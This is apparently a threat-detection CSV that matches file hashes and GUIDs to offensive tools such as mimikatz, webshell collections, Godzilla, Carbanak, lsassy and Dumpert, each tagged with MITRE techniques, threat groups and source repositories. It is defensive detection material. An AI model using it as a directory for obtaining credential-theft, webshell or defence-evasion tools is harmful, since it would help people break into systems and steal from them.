"*3130a3c87196583390827cf55f5e5e4ef008251885f1c9a07866df3699faab3d*",".{0,1000}3130a3c87196583390827cf55f5e5e4ef008251885f1c9a07866df3699faab3d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24236"
"*3130a3c87196583390827cf55f5e5e4ef008251885f1c9a07866df3699faab3d*",".{0,1000}3130a3c87196583390827cf55f5e5e4ef008251885f1c9a07866df3699faab3d.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","24237"
"*313624d826ed99d5bb9dce9401b5459c57addec56744a917516aae5a683d6c44*",".{0,1000}313624d826ed99d5bb9dce9401b5459c57addec56744a917516aae5a683d6c44.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24239"
"*313a44aa4708001af16cf83b3bcd98fdc20c0ac0f5d9062a1541a498b085b978*",".{0,1000}313a44aa4708001af16cf83b3bcd98fdc20c0ac0f5d9062a1541a498b085b978.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24240"
"*313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df*",".{0,1000}313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24241"
"*3140428b83a45c63384cb4929316ac23dd8ca006a7b8ce4efd97f88f45e85d9b*",".{0,1000}3140428b83a45c63384cb4929316ac23dd8ca006a7b8ce4efd97f88f45e85d9b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24243"
"*3141b56aedfc8fafa19b406b904264a35451008ce5cdc4cff6255f25ea77591c*",".{0,1000}3141b56aedfc8fafa19b406b904264a35451008ce5cdc4cff6255f25ea77591c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24244"
"*3142704750b73f299cc6a726fdf3c7ae1e7c75ea8f62769a36072488b23651c4*",".{0,1000}3142704750b73f299cc6a726fdf3c7ae1e7c75ea8f62769a36072488b23651c4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24246"
"*314bf9a5bd1f5d13c2dbc28f52e22e401c5216ad5071e5bf46de4b93d882c72f*",".{0,1000}314bf9a5bd1f5d13c2dbc28f52e22e401c5216ad5071e5bf46de4b93d882c72f.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","24248"
"*3150f104ac2f5f1eead627411f14fdc43e50e18aaba185cdfba03cd99475dfac*",".{0,1000}3150f104ac2f5f1eead627411f14fdc43e50e18aaba185cdfba03cd99475dfac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24250"
"*315bb4e894fc10642514693e365e7a5f6df0e0c12b21c392aa983da5c8c49974*",".{0,1000}315bb4e894fc10642514693e365e7a5f6df0e0c12b21c392aa983da5c8c49974.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24252"
"*315C301F-E392-4F7D-9108-8E621C11D662*",".{0,1000}315C301F\-E392\-4F7D\-9108\-8E621C11D662.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","24253"
"*315edea7f4235f5a8c3ca70bacb414e4694e963f41df5c367aa7a0448581ff56*",".{0,1000}315edea7f4235f5a8c3ca70bacb414e4694e963f41df5c367aa7a0448581ff56.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24254"
"*316511d5905a2222abfe317a2fb937588825fe29231c5b122ab790966c3a36bc*",".{0,1000}316511d5905a2222abfe317a2fb937588825fe29231c5b122ab790966c3a36bc.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24255"
"*3170917f0dbe26d4a09283394af0b9a9e9724589cd650d0b451b2c834aab3bf6*",".{0,1000}3170917f0dbe26d4a09283394af0b9a9e9724589cd650d0b451b2c834aab3bf6.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24257"
"*3176f76d36507132d3356898ae0823d34e9deeb1af3187ac7645922a0509cda9*",".{0,1000}3176f76d36507132d3356898ae0823d34e9deeb1af3187ac7645922a0509cda9.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24259"
"*3177334ae8eb2317c5e0775b05a002a43360a76dea4d068d35f9c271c1499408*",".{0,1000}3177334ae8eb2317c5e0775b05a002a43360a76dea4d068d35f9c271c1499408.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24260"
"*3178ccb34c7dfd53d77a18d891bdc3d6376f5346746d65e6d386cc9c36040c39*",".{0,1000}3178ccb34c7dfd53d77a18d891bdc3d6376f5346746d65e6d386cc9c36040c39.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24261"
"*31795b2f772b6ad00274cc4eb40aaf81b5d38d6eeae56bace80a07bbb1aeac35*",".{0,1000}31795b2f772b6ad00274cc4eb40aaf81b5d38d6eeae56bace80a07bbb1aeac35.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","24262"
"*3180a45a681653c3413afb788680f02754995a734bef851661056683691920e8*",".{0,1000}3180a45a681653c3413afb788680f02754995a734bef851661056683691920e8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24263"
"*3188b14bc09838bf33b57704649237b1c1d343189edaf142cfcf9608c4a41e5d*",".{0,1000}3188b14bc09838bf33b57704649237b1c1d343189edaf142cfcf9608c4a41e5d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24264"
"*318c7820d295ab78772ec8424dfc4e0a9619d81ea56ab4df81236f1a42707c97*",".{0,1000}318c7820d295ab78772ec8424dfc4e0a9619d81ea56ab4df81236f1a42707c97.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24265"
"*318de1de99b98b45fc0af84a0ee30ae88e3d3b44016e460696b1b095525ba382*",".{0,1000}318de1de99b98b45fc0af84a0ee30ae88e3d3b44016e460696b1b095525ba382.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24266"
"*319040bad23d4d4c36c6db35f2d44650aba8ef3e34652f3a39bb383cf6f988db*",".{0,1000}319040bad23d4d4c36c6db35f2d44650aba8ef3e34652f3a39bb383cf6f988db.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24267"
"*319895b096e8bd0d034246c8b7f11b067fc54831451f14d77d04f9b9c50818bc*",".{0,1000}319895b096e8bd0d034246c8b7f11b067fc54831451f14d77d04f9b9c50818bc.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","24268"
"*319d36ae7ed7260c42b1ce5a90c73bfbcaf35ad9e63326547ec6b20e3cecb9cb*",".{0,1000}319d36ae7ed7260c42b1ce5a90c73bfbcaf35ad9e63326547ec6b20e3cecb9cb.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24271"
"*319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae*",".{0,1000}319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","24272"
"*31a743113d28136e8facd24ed8fac8bb73fdf70a07a4451bb6aff3b2e648fd38*",".{0,1000}31a743113d28136e8facd24ed8fac8bb73fdf70a07a4451bb6aff3b2e648fd38.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","24273"
"*31a854dd758df379bdccbc630737a0e81e7f751e8dfa9d6d18e27a415add3c85*",".{0,1000}31a854dd758df379bdccbc630737a0e81e7f751e8dfa9d6d18e27a415add3c85.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24274"
"*31a97e6377d69a3ae7974a441d52657d200210087bfcac7f0c4f79dddf9f488b*",".{0,1000}31a97e6377d69a3ae7974a441d52657d200210087bfcac7f0c4f79dddf9f488b.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","24275"
"*31abb963d6b98c0d5068bb32c6d13c98694a45a4cd9af738b215d7ff96944140*",".{0,1000}31abb963d6b98c0d5068bb32c6d13c98694a45a4cd9af738b215d7ff96944140.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","24277"
"*31ad473e63f8dab709b9b7a772cbd9a33e66d7f3510aa6fc261003e17040ed1f*",".{0,1000}31ad473e63f8dab709b9b7a772cbd9a33e66d7f3510aa6fc261003e17040ed1f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24278"
"*31afc2becc2f46a5f993745e453b13146ca804c48eab0c5b41ba859286cad77a*",".{0,1000}31afc2becc2f46a5f993745e453b13146ca804c48eab0c5b41ba859286cad77a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24279"
"*31afdc793da401fdfbe73addfab29166c47ff9c9e39a82661f621ca43a79c6c4*",".{0,1000}31afdc793da401fdfbe73addfab29166c47ff9c9e39a82661f621ca43a79c6c4.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24280"
"*31b32d51b5a7d8cd0ca07b410bb0bfd0ff95a92572789788c14b144feb1486c2*",".{0,1000}31b32d51b5a7d8cd0ca07b410bb0bfd0ff95a92572789788c14b144feb1486c2.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","24281"
"*31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80*",".{0,1000}31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24282"
"*31ba179b08e80d07e8bfad5c7eb4e1a68a7ccfe81735e4807257c847b5478d6d*",".{0,1000}31ba179b08e80d07e8bfad5c7eb4e1a68a7ccfe81735e4807257c847b5478d6d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","24283"
"*31ba44f9696e84b64506a11c691d123f3298d7de9c9be6ed786cb1258518a45a*",".{0,1000}31ba44f9696e84b64506a11c691d123f3298d7de9c9be6ed786cb1258518a45a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24284"
"*31bd80a4afc0f06bce365a02b6035e55d7a13d2e9c949b4d401133a4deef5c40*",".{0,1000}31bd80a4afc0f06bce365a02b6035e55d7a13d2e9c949b4d401133a4deef5c40.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","24286"
"*31bec1471840a741ead2128106a98746d4b346a7bfd737579dcc088d31b00eb5*",".{0,1000}31bec1471840a741ead2128106a98746d4b346a7bfd737579dcc088d31b00eb5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24287"
"*31c88d5ad49ee789d4905d5555adf6352e22acb5e8dfb62866247af7ac9525b3*",".{0,1000}31c88d5ad49ee789d4905d5555adf6352e22acb5e8dfb62866247af7ac9525b3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24290"
"*31d41c42dc9bad6dc8dbcf7c232d690e672ffd9c3c08a7fb5c40766d8a043026*",".{0,1000}31d41c42dc9bad6dc8dbcf7c232d690e672ffd9c3c08a7fb5c40766d8a043026.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","24291"
"*31da885ad54c3557157849781dcca4056bd8594c5551114f1eb7b43f704692dc*",".{0,1000}31da885ad54c3557157849781dcca4056bd8594c5551114f1eb7b43f704692dc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24292"
"*31dac83a82cc54324ac27d4754ed64a5ce454d8d85dfd8d2690da656ff7b304c*",".{0,1000}31dac83a82cc54324ac27d4754ed64a5ce454d8d85dfd8d2690da656ff7b304c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24293"
"*31ea6e085e202e97d79ce006e683f3bdb29e557899a52f6f284e40b86d434fb6*",".{0,1000}31ea6e085e202e97d79ce006e683f3bdb29e557899a52f6f284e40b86d434fb6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24295"
"*31ee7ee1add800239003806829b825cadc5b95797c11e33cf6b691571c1e2069*",".{0,1000}31ee7ee1add800239003806829b825cadc5b95797c11e33cf6b691571c1e2069.{0,1000}","offensive_tool_keyword","WirelessKeyView","WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ","T1003 - T1083 - T1552","TA0006 ","N/A","GoGoogle","Credential Access","https://www.nirsoft.net/utils/wireless_key.html","1","0","#filehash","N/A","7","10","N/A","N/A","N/A","N/A","24296"
"*31f63c6923ddd1a842839f7ef1d54fec535f94760d89f0a90ad83a19dc906a8c*",".{0,1000}31f63c6923ddd1a842839f7ef1d54fec535f94760d89f0a90ad83a19dc906a8c.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","24297"
